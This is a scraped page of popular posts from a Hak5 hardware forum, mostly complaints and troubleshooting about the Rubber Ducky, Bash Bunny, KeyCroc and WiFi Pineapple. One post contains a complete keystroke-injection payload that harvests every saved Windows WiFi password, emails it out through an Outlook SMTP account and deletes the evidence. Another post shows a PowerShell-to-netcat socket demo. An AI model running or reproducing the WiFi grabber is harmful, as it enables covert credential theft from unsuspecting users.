Jump to content

Leaderboard

  1. spywll

    spywll

    Active Members


    • Points

      3

    • Content Count

      57


  2. Rkiver

    Rkiver

    Dedicated Members


    • Points

      2

    • Content Count

      1,182


  3. Phoenix75

    Phoenix75

    Active Members


    • Points

      2

    • Content Count

      10


  4. Ven0mRat

    Ven0mRat

    Active Members


    • Points

      2

    • Content Count

      14



Popular Content

Showing content with the highest reputation since 07/01/2020 in Posts

  1. 1 point
    Hi to all, I've bought this device for pentesting and learning. I'm quite a newbie about that kind of hardware..but it seems that the actual Windows Defender of 1903 Windows Edition prevent every kind of payload working. Is that true? I've tried quite 50 payloads. With a System with Defender on it not starts at all. I've also flashed the Ducky with Twin Ducky...it seems that is worse..it takes sometimes to analyze the usb and sometimes finds the inject.bin and remove it. All payload with "gmail send" are not working because of authentication, every payload with password grabbing are not working because Nirsoft removed command line text export for security purposes...so this is a useless expensive usb key and nothing more? Now, my question: It's really possibile outside Mister Robot series using that device in a real environment? Because I've invested about 20 hours on it and i don't find a way to make it really have a real use if the system is protected..but i've spent aout 90$ in my country for buying it. If somenone has been able to make it works i will be glad to know. Thank You.
  2. 1 point
    A work around for this is to swap the order of the lines in the language file. The Q and QUACK scripts seem to take the last instance in the file and 'quack' out that key code. The files are in the languages folder on the udisk. Try using to attached file instead to see if it helps. Make sure to unplug and re-connect the KeyCroc to enable the changes. us.json
  3. 1 point
    I got it to sort-of work by adding this to /etc/dnsmasq.conf dhcp-option-force=224,my_payload_string Very strange but good enough for now. Thanks!
  4. 1 point
    I am sorry i see what your saying your talking about the \ symbol escape yes your right you don't need them there. name=\"%i\" key=clear - should be name="%i" key=clear everything passed to QUACK STRING is interpreted by bash - so you may need to escape some special characters. i just started adding \ escape to the payload to make it work and once it work i left it alone BIG Thanks Dice i will update
  5. 1 point
    WiFi password Grabber (Windows 10) This script will grab not just the current SSID and password your computer is connecting to but every single SSID and password you have previously connected/saved on your computer. And it works even if the WiFi name contains special characters (such as a smiley face) or spaces. I'm not using gmail here because Google is pretty restrictive when it comes to 3rd party app authentication (let me know if it works with other mail server such as yahoo, zoho, etc) You might want to adjust the DELAY depending on the system you are running e.g set a higher delay time if your system is slow. Change the following things: ACCOUNT: Your hotmail/outlook account PASSWORD: Your hotmail/outlook password RECEIVER: The email you want to send the content of Log.txt to I have tested this myself and it works some time you may need to run it 2 or 3 times and you can change the MATCH to what you want MATCH wifipass QUACK DELAY 1000 QUACK REM --> Minimize all windows QUACK WINDOWS d QUACK REM --> Open cmd QUACK WINDOWS r QUACK DELAY 1000 QUACK STRING "cmd" QUACK ENTER QUACK DELAY 1000 QUACK REM --> Get all SSID QUACK STRING "cd %USERPROFILE% & netsh wlan show profiles | findstr \"All\" > a.txt" QUACK ENTER QUACK REM --> Create a filter.bat to get all the profile names QUACK STRING "echo setlocal enabledelayedexpansion^" QUACK ENTER QUACK ENTER QUACK STRING "for /f \"tokens=5*\" %%i in (a.txt) do (^" QUACK ENTER QUACK ENTER QUACK STRING "set val=%%i %%j^" QUACK ENTER QUACK ENTER QUACK STRING "if \"!val:~-1!\" == \" \" set val=!val:~0,-1!^" QUACK ENTER QUACK ENTER QUACK STRING "echo !val!^>^>b.txt) > filter.bat" QUACK ENTER QUACK REM --> Run filter.bat and save all profile names in b.txt QUACK STRING "filter.bat" QUACK DELAY 1000 QUACK ENTER QUACK REM --> Save all the good stuff in Log.txt and delete the other garbage files QUACK STRING "(for /f \"tokens=*\" %i in (b.txt) do @echo SSID: %i & netsh wlan show profiles name="%i" key=clear | findstr /c:\"Key Content\" & echo.) > Log.txt" QUACK ENTER QUACK DELAY 1000 QUACK STRING "del a.txt b.txt filter.bat" QUACK ENTER QUACK REM --> Mail Log.txt QUACK STRING "powershell" QUACK ENTER QUACK DELAY 1000 QUACK STRING "\$SMTPServer = 'smtp-mail.outlook.com'" QUACK ENTER QUACK STRING "\$SMTPInfo = New-Object Net.Mail.SmtpClient(\$SmtpServer, 587)" QUACK ENTER QUACK STRING "\$SMTPInfo.EnableSSL = \$true" QUACK ENTER QUACK STRING "\$SMTPInfo.Credentials = New-Object System.Net.NetworkCredential(\"your email here\", \"password here\")" QUACK ENTER QUACK STRING "\$ReportEmail = New-Object System.Net.Mail.MailMessage" QUACK ENTER QUACK STRING "\$ReportEmail.From = 'your email here'" QUACK ENTER QUACK STRING "\$ReportEmail.To.Add('add email to send to here')" QUACK ENTER QUACK STRING "\$ReportEmail.Subject = 'WiFi key grabber'" QUACK ENTER QUACK STRING "\$ReportEmail.Body = (Get-Content Log.txt | out-string)" QUACK ENTER QUACK STRING "\$SMTPInfo.Send(\$ReportEmail)" QUACK ENTER QUACK DELAY 3000 QUACK STRING "exit" QUACK ENTER QUACK DELAY 1000 QUACK REM --> Delete Log.txt and exit QUACK STRING "del Log.txt & exit" QUACK ENTER BIG THANKS TO Darren Kitchen RootJunky and Cribbit for all the help window-wifi-passwd.txt
  6. 1 point
    BIG BIG THANKS TO Cribbit and RootJunky yes my Num lock was onπŸ˜• payloads are working my bad THANKS AGIAN GUYS
  7. 1 point
    I don't know if this will be any use to anyone but. i create a poc to demonstrate sending the a status/progress of a powershell script to the bunny. The ps only send number 1,2 (3or4) & 5 with sleeps in between. And the bunny just changes it's LED depending on the number. when it get a 5 it quack the command to closes the powershell windows. #!/bin/bash trap "kill 0" EXIT LED SETUP ATTACKMODE RNDIS_ETHERNET HID GET SWITCH_POSITION GET HOST_IP cd /root/udisk/payloads/$SWITCH_POSITION/ FILE=data.txt #Clear old commands if [ -f "$FILE" ]; then cat /dev/null > "$FILE" fi LED SPECIAL # Set up an echo command to right to file. # using echo as nc only finish writing when the connection closes. CMD="while true; do read i && echo \$i >> $FILE ; done" # set nc to run in its own process nc -lvn -p 8080 -c "$CMD" & # give nc time to start sleep 1 # set the last command to empty last=""; LED ATTACK Q DELAY 200 RUN WIN "powershell" Q DELAY 100 # Create a connect object Q STRING "\$client = New-Object System.Net.Sockets.TcpClient;" Q DELAY 100 # set the host and port and connect to nc Q STRING "\$client.Connect(\"$HOST_IP\",8080);" Q DELAY 100 # create a stream for that connection Q STRING "\$stream = new-object System.IO.StreamWriter \$client.GetStream();" Q DELAY 100 # get powershell to sleep Q STRING "Start-Sleep -Seconds 3;" Q DELAY 100 # the 1 the the stream Q STRING "\$stream.WriteLine(\"1\");" Q DELAY 100 # push this over to nc Q STRING "\$stream.Flush();" Q DELAY 100 Q STRING "Start-Sleep -Seconds 3;" Q DELAY 100 Q STRING "\$stream.WriteLine(\"2\");" Q DELAY 100 Q STRING "\$stream.Flush();" Q DELAY 100 Q STRING "Start-Sleep -Seconds 3;" Q DELAY 200 # Send a 3 or 4 Q STRING "\$stream.WriteLine((3+(Get-Random -Maximum 2)).ToString());" Q DELAY 100 Q STRING "\$stream.Flush();" Q DELAY 100 Q STRING "Start-Sleep -Seconds 3;" Q DELAY 100 Q STRING "\$stream.WriteLine(\"5\");" Q DELAY 100 Q STRING "\$stream.Flush();" Q DELAY 100 #Close connection Q STRING "\$client.Close();" Q DELAY 100 Q ENTER LED SPECIAL # forever loop while : do # get the last line of the file removing line feeds (10) and carriage returns (13) curr=$(tail -1 "$FILE" | tr -d '\r\n') #curr=$(tail -1 "$FILE" | sed -e 's/[\r\n]//g') # see if the last command is different to the curr command if [ "$last" != "$curr" ] ; then # set the last to the current command last="$curr" # go to the section based on the command # most just change led color and rate on flashing. case $curr in 1) LED STAGE1;; 2) LED SPECIAL2;; 3) LED STAGE3;; 4) LED STAGE4;; 5) LED SPECIAL5 Q DELAY 100 # close powershell Q STRING "exit" Q ENTER break;; esac fi done LED FINISH sleep 1 The powershell is all on different lines just to make it easy to read. As i said don't know if this will of any uses to anyone but it may you never know may spark an idea in someone else
  8. 1 point
    https://forums.hak5.org/topic/28600-do-not-post-wifi-pineapple-related-questions-here/
  9. 1 point
    Not in my experience you will do a firmware flashing as part of the set up
  10. 1 point
    And I have tetra too, you have a right this is a sh*t
  11. 1 point
    What do you think about bashbunny? Is it better than rubber ducky? I have bashbunny and I think about buying rubber ducky.
  12. 1 point
    I think it's time you start taking dumps to see where it's getting held up. I only work with AWS/GCP so my expertise ends here. Sorry!
  13. 1 point
    Hey Shanimal, So Google Cloud Platform (GCP) uses two sets of firewalls by default. The VM's firewall, and the Virtual Private Cloud (VPC) firewall. In order to host Cloud C2 you will need to adjust your VPC firewalls rules through the VPC > Firewall tool. You should have something set like this below... You will create a network tag to apply to the VM of your choosing. Add/Remove ports as needed. If you want some hands on assistance just send me a message.
  14. 1 point
    I had a tetra for a while and can never get it to work reliably the most it did was troll people with fake SSIDs. I have bought most of this stuff as my Job paid for it but the only slightly useful thing out of all Hak5 is rubber ducky.
  15. 1 point
    Sweet! Nice work SelfTaughtDude!
  16. 1 point
    @Darren Kitchen I think that you need to look at at this.
  17. 1 point
    Same experience here on the functionality of the product. Such a shame. Product testing- UAT etc. Seems to have been left out of the development cycle. My Tetra is just an ornament to what might have been. On my third Pineaple product- none works as advertised. My $45 deauther in wrist watch form is far better to death- like it does it when I set it to do so πŸ˜‰ Radical huh.
  18. 1 point
    I agree with all of you here. This product is much over hyped and it is frustrating to say the least. I bought this a few days back and I wished I had read all the feedback before I purchased it. I wished I had read this blog post about how the Wifi Pineapple is a total sham https://medium.com/@dephekt/a-review-of-the-pineapple-tetra-and-hak5-7198a98d8990 I hope the community realizes that hak5 is just swindling people their money with this bullshit product. I paid this out of my own pocket and I cant use this on any engagement. Feeling dejected and frustrated. Shame on you Hak5 for this lousy Wifi Pineapple Tetra product.
  19. 1 point
    Exactly same sentiment here. Spent $200 on something that won't work. (In my case, it's stuck on "...still booting" screen with any SSH connection refused). My first thought was "Okay, I'll chance another $200 if they won't help." But hell, seeing all these problems with no resolution -- another $200 would be a guaranteed waste.
  20. 1 point
    I hear you. Having fun with this useless device myself for the last 2 days. I'm experiencing the exact same issues and intermittently being locked out form connecting via management or the pineapple AP. My 2 laptops now report "unrecognized" USB device when connected via the Y cable. This worked just fine only yesterday. No luck connecting via the Ethernet port either. The tetra is a very unstable half backed device. I've just requested a return/refund. Let see what I get in response.
  21. 1 point
    Are you using Pineapple or straight Kali Linux?
  22. 1 point
    After upgrading Pineapple Nano to version 2.7.0. SD card - SanDisk Ultra 64GB microSDXC is not mounted automatically. I can format the SD card using the GUI and it is visible, but I cannot install modules on it. Can I count on help in this matter?
  23. 1 point
    Great to see someone encountering a problem and using their ability to research and learn to solve it!!
  24. 1 point
    Please Disregard i have gotten it working after a firmware recovery and setting it up on a different host for what ever reason it didnt like my Kubuntu machine
  25. 1 point
    https://forums.hak5.org/forum/64-wifi-pineapple/ Every item has it's own section of the forums.
  26. 1 point
    Yeah there is no way I would take this into an engagement. I REALLY want to Pineapple to work, and I really wish it would. But it can't do 50% of the things it is supposed to out of the box, and I am not talking about 3rd party modules, The bread and butter of what the Pineapple should do is: 1. Enumerate APs and clients associated to those APs 2. Capture and broadcast the SSIDs of the APs it has discovered 3. Deauth clients in order to get them to connect to the Pineapple's rogue SSIDs. It does point 1 perfectly. Points 2 and 3, not so much. 2. It can't even properly take an SSID and load it into the pool without corrupting the name. This is just poor coding. 3. It cannot dauth anything. I mean nothing. I made a small deauther using a Nodemcu Amica, and it works better than the Pineapple, and it didn't cost 200USD. I own several Rubber Duckies and those are excellent pentesting tools, so long as you write your scrips and customise your attacks depending on your target. I cannot say the same for the Pineapple. Much hype, little delivery. It's actually disappointing that Darren refuses to acknowledge this problem.
  27. 1 point
    Most likely you are not close enough or have strongest signal for a success deauth between Target AP and Client device.
  28. 1 point
  29. 1 point
    You can't really answer Q2 without answering Q1, since you don't know what penetration methods can be used. You just threw out some tech jargon and common tools, kinda "let's see what sticks" approach. And it sounds like you have no ideas for Q1, so why should you get this job? I would suggest you brush up on penetration techniques, specifically related to Windows and Active Directory. The following Google search yielded some really interesting articles that seem pertinent to what you are looking for: https://www.google.com/search?q=pentest+find+user+machine+from+employee+name&oq=pentest+find+user+machine+from+employee+name&aqs=chrome..69i57j33.9488j1j7&sourceid=chrome&ie=UTF-8 I especially enjoyed the article from https://hausec.com, which walks you through the process from the beginning. I'm not going to give you direct answers, since that would make me more qualified for this job than you. I also don't claim to have all the answers, but I'm not the one interviewing for a infosec job, as much as I would love a career change. I wish you luck on your job search and I hope you can gain the knowledge you need to do your job well and impress the interviewers.
  30. 1 point
    Sorry...there must be a kind misunderstanding. I'm telling that if you plug the ducky into a Windows 10 actual environment, this environment doesn't permit the launch of the ininjection file...you're telling me that i've to improve. πŸ™‚ If isn't possible to launch a file from a USB keyboard emulator like Rubber Ducky is the device is useless and how do you right told, good only for demo online and for selling it. The thing that hurt me is that is still sold on Amazon and on the HAK5 site when it's clear that today you can't use it in a real environment. If you tell me that bunny works maybe i can try...but i've doubt that you can bypass a windows machine with an antivirus full modules enabled..have you tried? if not bypass, will turn also that hardware in a useless one. I'm talking about windows because 95% of pc's of the world are windows based. Thank you very much anyway for your support, nice to meet you.
  31. 1 point
    Your best tool for security is yourself...
×
×
  • Create New...